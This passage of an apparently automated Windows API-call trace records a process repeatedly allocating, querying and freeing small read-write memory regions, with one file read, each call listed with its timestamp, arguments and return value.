	[0219.506] VirtualFree (lpAddress=0x1bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.506] VirtualFree (lpAddress=0x1b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.507] VirtualFree (lpAddress=0x1b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.507] VirtualFree (lpAddress=0x1b70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.507] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.507] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1b80000
	[0219.507] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000
	[0219.508] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1bc0000
	[0219.508] VirtualQuery (in: lpAddress=0x1bc0000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x1bc0000, AllocationBase=0x1bc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.508] VirtualFree (lpAddress=0x1bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.508] VirtualFree (lpAddress=0x1b90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.508] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000
	[0219.509] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1bc0000
	[0219.509] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x1bd0000
	[0219.509] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.509] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1bf0000
	[0219.510] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1c00000
	[0219.510] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1c10000
	[0219.510] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x1c20000
	[0219.510] VirtualAlloc (lpAddress=0x0, dwSize=0x1d, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000
	[0219.511] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.511] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1d60000
	[0219.511] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d70000
	[0219.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000
	[0219.512] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1d90000
	[0219.512] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.512] VirtualFree (lpAddress=0x1d70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.512] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1d70000
	[0219.512] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5d808, dwLength=0x1c | out: lpBuffer=0x1b5d808*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.513] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.513] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000
	[0219.513] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.513] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000
	[0219.513] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1db0000
	[0219.514] VirtualFree (lpAddress=0x1da0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.514] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.514] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.514] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000
	[0219.515] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.515] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.515] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.515] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000
	[0219.516] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.516] VirtualFree (lpAddress=0x1dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.516] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.516] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.516] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.517] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000
	[0219.517] VirtualFree (lpAddress=0x1f00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.517] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.517] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.518] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.518] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1f20000
	[0219.518] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000
	[0219.518] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1f40000
	[0219.519] VirtualFree (lpAddress=0x1f30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.519] VirtualFree (lpAddress=0x1f20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.519] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1f20000
	[0219.519] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000
	[0219.519] VirtualQuery (in: lpAddress=0x1d80000, lpBuffer=0x1b5d808, dwLength=0x1c | out: lpBuffer=0x1b5d808*(BaseAddress=0x1d80000, AllocationBase=0x1d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.519] VirtualQuery (in: lpAddress=0x1d80000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x1d80000, AllocationBase=0x1d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.519] VirtualAlloc (lpAddress=0x0, dwSize=0x180, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.520] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.520] VirtualAlloc (lpAddress=0x0, dwSize=0x25, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000
	[0219.520] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1f60000
	[0219.520] VirtualAlloc (lpAddress=0x0, dwSize=0x1f, flAllocationType=0x3000, flProtect=0x4) returned 0x1f70000
	[0219.521] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1f80000
	[0219.521] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.521] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.522] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.522] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.522] VirtualQuery (in: lpAddress=0x1f50000, lpBuffer=0x1b5d808, dwLength=0x1c | out: lpBuffer=0x1b5d808*(BaseAddress=0x1f50000, AllocationBase=0x1f50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.522] VirtualQuery (in: lpAddress=0x1f50000, lpBuffer=0x1b5d804, dwLength=0x1c | out: lpBuffer=0x1b5d804*(BaseAddress=0x1f50000, AllocationBase=0x1f50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.522] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x1fd0000
	[0219.522] VirtualFree (lpAddress=0x1f50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.523] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.523] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1fe0000
	[0219.523] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000
	[0219.523] VirtualFree (lpAddress=0x1fe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.524] VirtualFree (lpAddress=0x1f50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.524] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.524] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1fe0000
	[0219.524] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000
	[0219.525] VirtualQuery (in: lpAddress=0x2000000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2000000, AllocationBase=0x2000000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.525] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.525] VirtualFree (lpAddress=0x1fe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.525] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1fe0000
	[0219.526] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000
	[0219.526] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2010000
	[0219.526] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2020000
	[0219.527] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x4) returned 0x2030000
	[0219.527] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x2040000
	[0219.527] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.528] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.528] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000
	[0219.528] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.528] VirtualFree (lpAddress=0x2050000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.528] VirtualFree (lpAddress=0x2030000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.529] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2030000
	[0219.529] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2040000
	[0219.529] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.529] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.530] VirtualQuery (in: lpAddress=0x2080000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2080000, AllocationBase=0x2080000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.530] VirtualFree (lpAddress=0x2080000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.530] VirtualFree (lpAddress=0x2050000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.530] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.531] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.531] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2090000
	[0219.531] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000
	[0219.532] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.532] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.532] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x20e0000
	[0219.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x20f0000
	[0219.533] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.533] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.533] VirtualFree (lpAddress=0x20e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.534] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x20e0000
	[0219.534] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x20f0000
	[0219.534] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.534] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2120000
	[0219.535] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.535] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.535] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x20f0000
	[0219.535] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.536] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.536] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2140000
	[0219.536] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.536] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.537] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.537] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.537] VirtualAlloc (lpAddress=0x0, dwSize=0x36, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.537] VirtualQuery (in: lpAddress=0x2130000, lpBuffer=0x1b5d818, dwLength=0x1c | out: lpBuffer=0x1b5d818*(BaseAddress=0x2130000, AllocationBase=0x2130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.537] VirtualQuery (in: lpAddress=0x2130000, lpBuffer=0x1b5d814, dwLength=0x1c | out: lpBuffer=0x1b5d814*(BaseAddress=0x2130000, AllocationBase=0x2130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.538] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000
	[0219.538] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.538] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.538] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000
	[0219.539] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
	[0219.539] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.539] VirtualFree (lpAddress=0x2150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.539] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.540] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.540] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.540] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.540] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.541] VirtualQuery (in: lpAddress=0x2150000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2150000, AllocationBase=0x2150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.541] VirtualFree (lpAddress=0x2150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.541] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.541] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.542] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.542] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000
	[0219.542] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000
	[0219.542] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x21a0000
	[0219.543] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x21b0000
	[0219.543] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x21c0000
	[0219.543] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.544] VirtualFree (lpAddress=0x2150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.544] VirtualFree (lpAddress=0x2190000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.544] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.544] VirtualFree (lpAddress=0x21a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.544] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.545] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.545] VirtualQuery (in: lpAddress=0x2150000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2150000, AllocationBase=0x2150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.545] VirtualFree (lpAddress=0x2150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.545] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.546] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.546] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.546] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000
	[0219.546] VirtualQuery (in: lpAddress=0x2150000, lpBuffer=0x1b5d818, dwLength=0x1c | out: lpBuffer=0x1b5d818*(BaseAddress=0x2150000, AllocationBase=0x2150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.546] VirtualQuery (in: lpAddress=0x2150000, lpBuffer=0x1b5d814, dwLength=0x1c | out: lpBuffer=0x1b5d814*(BaseAddress=0x2150000, AllocationBase=0x2150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.546] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000
	[0219.547] VirtualFree (lpAddress=0x2150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.547] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.547] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x21a0000
	[0219.548] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.548] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x21e0000
	[0219.548] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000
	[0219.548] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.549] VirtualFree (lpAddress=0x2160000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.549] VirtualFree (lpAddress=0x2190000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.549] VirtualFree (lpAddress=0x21a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.549] VirtualFree (lpAddress=0x2150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.550] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.550] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.550] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.550] VirtualQuery (in: lpAddress=0x2150000, lpBuffer=0x1b5d80c, dwLength=0x1c | out: lpBuffer=0x1b5d80c*(BaseAddress=0x2150000, AllocationBase=0x2150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.550] VirtualFree (lpAddress=0x2150000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.551] VirtualFree (lpAddress=0x2130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.551] ReadFile (in: hFile=0x114, lpBuffer=0x17492a0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5dee8, lpOverlapped=0x1b5deac | out: lpBuffer=0x17492a0*, lpNumberOfBytesRead=0x1b5dee8*=0x800, lpOverlapped=0x1b5deac) returned 1
	[0219.551] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.551] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.552] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000
	[0219.552] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000
	[0219.552] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x21a0000
	[0219.552] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.553] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000
	[0219.553] VirtualAlloc (lpAddress=0x0, dwSize=0x78, flAllocationType=0x3000, flProtect=0x4) returned 0x2210000
	[0219.553] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2220000
	[0219.554] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.554] VirtualFree (lpAddress=0x2200000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.554] VirtualFree (lpAddress=0x21a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.554] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x21a0000
	[0219.555] VirtualAlloc (lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.555] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000
	[0219.555] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x2230000
	[0219.556] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2240000
	[0219.556] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2250000
	[0219.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2260000
	[0219.557] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2270000
	[0219.557] VirtualFree (lpAddress=0x2260000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.557] VirtualFree (lpAddress=0x2250000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.557] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x2250000
	[0219.558] VirtualAlloc (lpAddress=0x0, dwSize=0x33, flAllocationType=0x3000, flProtect=0x4) returned 0x2260000
	[0219.558] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000
	[0219.558] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2290000
